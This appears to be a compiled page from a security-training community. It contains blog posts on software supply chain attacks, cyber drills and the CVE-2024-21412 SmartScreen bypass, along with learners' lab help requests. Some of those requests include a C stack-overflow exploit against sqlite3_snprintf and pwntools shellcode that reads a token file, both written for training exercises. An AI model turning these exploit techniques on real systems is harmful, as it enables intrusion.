An Ounce of Prevention Beats a Pound of Postmortem with Supply Chain Security
Supply chain security is all about protecting your organization from risks and threats that come from external parties and processes you rely on. But trust, like code, is a dependency. And risk? That’s a side effect.

Case in point: this month, a widely used GitHub Action, tj-actions/changed-files, was compromised, proving that when the Git hits the fan, it can blow secrets across thousands of repos (CVE-2025-30066). It was a textbook case of a supply chain attack: a legitimate, trusted tool hijacked and used to compromise downstream users. Now, don’t get me wrong, we all love GitHub and a secure CI/CD pipeline. But when attackers injected malicious code into the action, stealing secrets like personal access tokens, npm tokens, and private RSA keys from affected CI/CD pipelines, over 23,000 repositories were exposed to cyber risk. This wasn’t a breach caused by a missed patch or weak password - it was a breach of inherited trust.

It highlights a pressing truth: supply chain security isn’t just a technical problem. It’s a cultural one. It demands dynamic cyber resilience. And I know you’re tired of hearing about SolarWinds, Log4Shell, and Kaseya. But it’s not just your security at stake – it’s everyone you rely on and everyone who relies on you. Even right now, we are watching The Biggest Supply Chain Hack Of 2025: 6M Records Exfiltrated from Oracle Cloud affecting over 140k Tenants 🙀

That’s why dependency monitoring, minimal permissions, and source validation are critical to securing your supply chain. In today’s software-driven world, trust is embedded in every layer of how we build and ship technology. We trust the tools, the teams, the platforms, the packages. To mitigate risks effectively, we need a clear understanding of them. Let’s explore approaching this with Immersive.

Third-party risk management

Business stakeholder lens: Procurement and vendor management teams must understand that security isn't just a checkbox during onboarding. Ongoing third-party risk reviews and SLAs with teeth are essential. Security leaders should train these teams to ask the right questions and recognize red flags.
Risk ISO 28000 – Security Management Systems for Supply Chains NIST 800-53: Ep.20 – Supply Chain Risk Management

Technical stakeholder lens: Security teams must know how to evaluate vendor security postures, monitor for changes, and validate that data flows are compliant and secure. Training should focus on threat modeling integrations and validating trust assumptions in vendor tooling.
Secure Fundamentals: Security Patching Mobile Application Security Fundamentals: Inadequate Supply Chain Security

Software supply chain

Business stakeholder lens: Non-technical leaders should understand that open source and third-party code aren't free – they come with ongoing maintenance, monitoring, and potential exposure. Funding and prioritization decisions should reflect this risk.
NCSC Cloud Security: Ep.9 – Supply Chain Security Stack Overflow Secure Fundamentals: Least Privileges Introducing the Cyber Kill Chain

Technical stakeholder lens: Developers and AppSec teams need to understand transitive dependencies (a.k.a. shadow dependencies), know how to interpret Software Bill of Materials (SBOMs), and be trained to look beyond their own code. CI/CD workflows must be hardened, with guardrails baked into the process.
CVE-2024-3094 (xz) – Supply Chain Compromise Events & Breaches: Monero Wallet Supply Chain Compromise Sunburst Supply Chain Compromise Collection

Hardware and physical supply chain

Business stakeholder lens: Especially in regulated or critical industries, leaders must ensure that logistics and sourcing teams are trained to recognize risks around counterfeit or tampered hardware.
Business Continuity 101 NIST 800-53: Ep.11 – Physical and Environmental Protection NIST 800-53: Ep.1 – Access Control

Technical stakeholder lens: IT and SecOps teams should be trained on verifying hardware provenance, firmware integrity, and secure provisioning practices. This is often an overlooked area in cyber training programs.
IoT & Embedded Devices: Supply Chain Hardware Tampering

Data handling in the chain

Business stakeholder lens: Legal and compliance teams must understand how data moves across vendors and jurisdictions. Training should focus on recognizing data sovereignty issues, breach notification responsibilities, and contractual risks.
Compliance Data Handling Secure Fundamentals: The CIA Triad Secure Data Handling

Technical stakeholder lens: Data engineers, architects, and security teams should be trained on protecting data in transit and at rest, especially when working with third-party platforms or integrations. Zero trust principles also apply.
OWASP 2021: Ep.8 – Software and Data Integrity Failures Modern Encryption

Operational resilience

Business stakeholder lens: Executives and business continuity teams must recognize that vendor outages or upstream compromises can impact downstream. Tabletop exercises should incorporate supply chain attack scenarios.
Recommended reading: House of cards: surviving a supply chain attack
Labs: Cyber for Board Members: Ep.8 – Supply Chains Cyber for Executives: Ep.7 – Supply Chain Security NIST 800-53: Ep.6 – Contingency Planning NIST 800-53: Ep.8 – Incident Response

Technical stakeholder lens: Incident response and engineering teams should be trained to detect and contain incidents involving third parties. This includes monitoring dependencies, rotating credentials, and updating playbooks for modern attack chains.
No Labs this time! Exercising becomes critical: Cyber Training Essentials for Supply Chain Resilience Supply Chain: Template for Technical Teams

You may not cause the vulnerability, but you'll own the breach. You can’t wait until the postmortem to start training your teams to see beyond the perimeter. A resilient cyber culture ensures that your people are ready to respond when trust is compromised. Supply chain security is a shared responsibility, but it starts with recognition and increasing cultural buy-in. At the end of the day, an ounce of prevention beats a pound of postmortem.

Share your thoughts

Did you learn anything surprising about the interconnectedness of supply chain risks? What do you think is the biggest hurdle to strong supply chain security? Share a practical tip or strategy that worked for you!

Big thanks to ZacharyAbrams for assisting with content reviews and recommendations in today’s blog! Want laser-focused recommendations for your unique program needs? Chat with your CSM about Premium Support to work with legends like Zack!

Get updates in your inbox on posts like this by following the Human Connection Blog!

Foundational Static Analysis: API Analysis
Hi all, I'm stuck in this part, where using Ghidra, I have to find where the Windows API GetModuleHandleA is used, in the binary called exercise_two.exe, and once located, find the parameter of this function. Taking a look at GetModuleHandleA, there are no references or calls to the API in any part of the code. I also tried to look for references to GetProcAddress or LoadLibrary and found nothing. Am I doing something wrong? Any idea how to find the "parameter" of the function that calls the API? It is the only question from this part remaining...

Thanks and regards.

Cyber Drills and Outcome-Based Programs: A Hands-On Approach to Cyber Resilience
What are cyber drills and outcome-based programs?

Cyber drills vs. outcome-based programs

Cyber drills (Prove) | Outcome-based programs (Improve)
Simulate a realistic cyberattack to test response capabilities | Ongoing, structured programs to build and improve security operations
Benchmark security preparedness at a given point in time | Measure progress over time with defined success metrics
Team-based exercises that focus on immediate response | Tailored multi-year programs that address specific security gaps
One-off or periodic events | Continuous learning and improvement

The key difference is that cyber drills test and prove preparedness and expose improvement areas; outcome-based programs address the improvement areas and enhance an organization’s ability to detect, respond, and recover from cyber threats. Combined, these approaches provide sustainable, robust cyber resilience.

Designing an effective outcome-based program

To implement an outcome-based program successfully, organizations must consider the following factors:

1. Understanding business objectives and risk tolerance
Before designing a program, it’s crucial to understand:
- Business goals – what is the organization trying to achieve?
- Risk appetite – how much risk is the company willing to take?
- Regulatory requirements – what compliance standards must be met?

2. Defining measurable outcomes
Success should be based on quantifiable improvements, such as:
- Reduced incident response time
- Fewer security breaches
- Improved threat detection capabilities
- More substantial alignment with regulatory requirements

3. Tailoring the program to the organization
Organizations are unique, and outcome-based programs must be customized to fit:
- Risk assessment results
- Threat landscape
- Technology stack and processes
- Security team capabilities

4. Implementing and monitoring progress
A phased approach ensures better adoption:
- Pilot phase – test the program with a small team before full deployment
- Phased rollout – implement step-by-step to ensure success
- Continuous reporting – regularly track metrics and adjust the program as needed

5. Demonstrating ROI and business value
To gain leadership buy-in, organizations must:
- Showcase case studies of successful implementations
- Use data-driven insights to highlight improvements
- Demonstrate long-term value beyond compliance

Example: A multi-year cybersecurity resilience program

A well-structured outcome-based program can span multiple years, evolving as threats change.
- Year 1 – Conduct cyber drills, crisis and incident response exercises and assessments, and document response plans. Develop improvement plans and program scope.
- Year 2 – Technical and executive training, incident handling exercises.
- Year 3 – Advanced cybersecurity drills, scenario-based threat modeling, multi-team exercising. Process and policy stress testing.
- Year 4 – Purple teaming, improving collaboration between defense and offense teams.
- Year 5 – Full-scale red teaming and supply chain cyber drills.

This approach ensures that organizations continuously prove and improve rather than just react to incidents.

Final thoughts: The future of cybersecurity training

Moving from traditional cybersecurity upskilling to cyber drills and outcome-based programs requires:
- A shift in mindset – focus on long-term resilience, not just one-time testing.
- Cross-department collaboration – security is not just IT’s responsibility; leadership buy-in is crucial.
- Expertise in design and delivery – outcome-based programs must be well-structured and measurable.

By embracing cyber drills and outcome-based cybersecurity training programs, organizations can stay ahead of threats and build a stronger, lasting security culture.

Share your thoughts

Is your organization ready to move beyond traditional cyber upskilling? Where do you feel the biggest challenge lies, out of the three points mentioned above? Have you had success in overcoming these challenges? If so, share how with the community.

Let’s build a cybersecurity strategy that delivers accurate, measurable results.

Linux Stack Overflow Ep.6
I am having trouble figuring out this lab. I got the other questions, but can't get the token. This is the code I am running, but it is just causing a segmentation fault.

    #include <assert.h>
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>

    #define RETADDR_OFFSET 0
    #define CANARY_OFFSET 0x40
    #define BUF_OFFSET 0x88
    #define CANARY 0xbaadd00dbaadd00dull
    #define ROPGADGET 0xdeadbeefdeadbeefull
    #define NGADGETS 1

    struct payload {
        uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
        uint64_t canary;
        uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
        uint64_t ropchain[NGADGETS];
    }__attribute__((packed, aligned(1)));

    int main(int argc, char *argv[]) {
        char dst[256];
        struct payload p;
        memset(p.padding1, 'a', sizeof(p.padding1));
        p.canary = CANARY;
        memset(p.padding2, 'b', sizeof(p.padding2));
        p.ropchain[0] = ROPGADGET;
        size_t target_n = 0x80000000;
        assert(sizeof(p) + 3 <= target_n);
        size_t n = target_n - sizeof(p) - 3;
        size_t target_i = 0x100000000 + (sizeof(p) / 2);
        char *src = calloc(1, target_i);
        if (!src) {
            printf("bad allocation\n");
            return -1;
        }
        size_t cur = 0;
        memcpy(src, &p, sizeof(p));
        cur += sizeof(p);
        memset(src+cur, '\'', n/2);
        cur += n/2;
        assert(cur < 0x7ffffffeul);
        memset(src+cur, 'c', 0x7ffffffeul-cur);
        cur += 0x7ffffffeul-cur;
        src[cur] = '\xc0';
        cur++;
        memset(src+cur, '\x80', target_i - cur);
        cur = target_i;
        src[cur-1] = '\0';
        sqlite3_snprintf((int) 256, dst, "'%!q'", src);
        free(src);
        return 0;
    }

Understanding CVE-2024-21412: A Zero-Day Exploit Targeting Windows Users
What is CVE-2024-21412?

CVE-2024-21412 is a security feature bypass vulnerability in Windows Defender SmartScreen. SmartScreen typically evaluates the safety of downloaded files and displays warnings for unrecognised or suspicious ones. But this vulnerability allows attackers to circumvent warnings and install malware on unsuspecting systems.

Which systems are affected?

CVE-2024-21412 impacts a broad range of Windows systems, including:
- Windows 10 (various versions)
- Windows 11 (various versions)
- Windows Server 2019 and later versions

How can this vulnerability be used against your systems?

Attackers exploited CVE-2024-21412 by crafting a Windows Internet shortcut (.url file) that pointed to another .url file on a remote SMB share. This technique tricked the system into automatically executing the file at the final location, bypassing SmartScreen's security warnings. Researchers even created a proof-of-concept exploit, demonstrating how easy the vulnerability is to exploit.

Attackers also abused the Microsoft Search Protocol (MSP) to deceive users. They crafted malicious links that appeared to point to local files, but in reality, connected to an attacker-controlled server. This tricked users into opening malicious files without realising they were downloading them from an external source.

How to protect your organisation

Microsoft addressed CVE-2024-21412 with a patch released in mid-February 2024. Installing this patch is crucial to mitigate the risk associated with this vulnerability.

In addition to patching, organisations should implement comprehensive monitoring and detection systems to identify and mitigate threats across all stages of an attack. This includes using intrusion detection systems, firewalls, and security information and event management (SIEM) tools to monitor network traffic and system activity for suspicious behaviour.
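
One way to hunt for the shortcut chaining described above, as an added example that is not part of the original post: the script parses Internet Shortcut contents and flags any whose target is another .url on a remote share. The function names, verdict labels and sample shortcuts (hosts under .test) are constructed for illustration.

```python
"""Flag Internet Shortcut (.url) files that point at another .url on a remote share."""
from urllib.parse import unquote, urlsplit

LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def shortcut_target(text):
    """Return the URL= value of the [InternetShortcut] section, or None."""
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")  # tolerate a leading byte order mark
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                return value.strip()
    return None


def share_host_and_path(target):
    """Return (host, path) for UNC and file: targets, (None, path) for other schemes."""
    parts = urlsplit(target.strip('"').replace("\\", "/"))
    if parts.scheme not in ("", "file"):
        return None, unquote(parts.path)  # http(s) and the like: ordinary web shortcut
    host, path = parts.netloc.lower(), unquote(parts.path)
    if not host and path.startswith("//"):  # file:////host/share/... spelling
        host, _, rest = path[2:].partition("/")
        host, path = host.lower(), "/" + rest
    return host, path


def classify(text):
    """Return 'no-target', 'ok', 'remote-share' or 'remote-shortcut-chain'."""
    target = shortcut_target(text)
    if target is None:
        return "no-target"
    host, path = share_host_and_path(target)
    if host is None or host in LOCAL_HOSTS:
        return "ok"
    if path.lower().endswith(".url"):
        return "remote-shortcut-chain"  # shortcut pointing at a shortcut on a share
    return "remote-share"


# Constructed sample shortcut contents; host names under .test are placeholders.
SAMPLES = {
    "news.url": "[InternetShortcut]\nURL=https://www.example.test/news\n",
    "local.url": "[InternetShortcut]\nURL=file:///C:/Users/alice/Documents/notes.txt\n",
    "share.url": "[InternetShortcut]\nURL=file://files.example.test/public/readme.txt\n",
    "chain_file.url": "[InternetShortcut]\r\nURL=file://files.example.test/public/step2.url\r\n",
    "chain_unc.url": "\ufeff[InternetShortcut]\nIDList=\nurl=\\\\files.example.test\\public\\step2.URL\n",
    "empty.url": "[InternetShortcut]\nIconIndex=0\n",
}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{classify(text):22} {name}")
```

A "remote-share" verdict is worth a look on its own, but the chained case is the pattern this article describes.
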
Organisations should also consider employing advanced real-time behaviour analytics to monitor unusual activity and identify potential threats, even when they bypass traditional security measures. This involves analysing user and system behaviour patterns to detect anomalies that could indicate an attack.

Conclusion

CVE-2024-21412 highlights the importance of cybersecurity awareness and proactive measures; its risk can be mitigated with improved organisational cyber resilience and regular patching policies. As always, staying informed about potential vulnerabilities is a crucial step in reducing the risk of your organisation being attacked.

Recommended content

To learn how to detect this vulnerability in a sandboxed environment, check out the following lab: CVE-2024-21412 (SmartScreen Bypass) – Elastic Log Analysis. In this lab, you'll use Elasticsearch to detect the presence of malicious URL files in logs.

Share your thoughts

Have you seen this vulnerability being exploited in the wild? Have you patched your systems yet? Share your thoughts by commenting in the thread below.

Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve a lab in Immersive Labs, Pwntools: Ep. 6 — Demonstrate Your Skills, and I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible?

    shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0)

is what I tried:

    from pwn import *
    import struct

    # Start the challenge binary
    p = process("/opt/demonstrate-challenge")  # Use the correct path

    # === Part 1: Solve Arithmetic Challenge ===
    p.recvuntil(b"What is the sum of ")
    numbers = p.recvline().decode().strip().split(" and ")
    num1 = int(numbers[0])
    num2 = int(numbers[1].split("?")[0])
    print(f"[+] Solving: {num1} + {num2} = {num1 + num2}")
    p.sendline(str(num1 + num2))

    # === Part 2: Solve Packing Challenge ===
    p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n")
    values = p.recvline().decode().strip().split(" and ")
    val1 = int(values[0])
    val2 = int(values[1])
    print(f"[+] Packing values: {val1} and {val2}")
    payload = struct.pack("<II", val1, val2)
    p.send(payload)

    # === Part 3: Leak Address of parsing_check() ===
    elf = ELF("/opt/demonstrate-challenge")  # Load the ELF binary
    parsing_check_addr = elf.symbols['parsing_check']  # Get function address
    print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}")
    p.sendline(str(parsing_check_addr))

    # === Part 4: Send Shellcode to Read /home/token-user/token.txt ===
    file_path = '/home/token-user/token.txt'
    shellcode = shellcraft.cat2(file_path, 1, 40)  # Pwntools shellcode
    shellcode += shellcraft.ret()  # Ensure proper return
    assembled_shellcode = asm(shellcode)
    p.send(assembled_shellcode)

    # === Get Flag Output ===
    response = p.recvall()
    print(response)

Historic Steganography Lab
I've been stuck on question 6 in the Steganography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something within the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale". Here are some screenshots to help zero in where I'm at. Thanks all!

Help again Linux CLI: Ep.16 – Combining Commands
I feel like I'm banging my head against the wall with the last 2 questions of this lab. I've been stuck on question 5 for the grep command. Any hints on what I am doing wrong? Missing? And then the last question to run sleep. Huh? Is there a command to combine with the sleep 600? Any help would be appreciated. So I can finally do the last lab for Linux. =)

Need Help - Java: Insecure Temporary Files
This exercise appears to be fairly simple at first glance, however I am unable to meet the criteria for my code to be accepted. When I click on "Test My Code", it says "Working" but not "Secure". The Deployment Log says:

    VERIFY: Testing application functionality...
    VERIFY: PASS: Healthcheck page retrieved successfully
    VERIFY: PASS: Login page retrieved successfully
    VERIFY: PASS: Logged in with valid credentials
    VERIFY: PASS: User data loaded
    VERIFY: Tests complete. Application is WORKING

Ideally, either the Application Log or the Deployment Log should provide some clue of the error or the task that is not completed. I have used the recommended method to create a Temporary File and delete it in a finally block after use. I can provide my code changes here, if needed.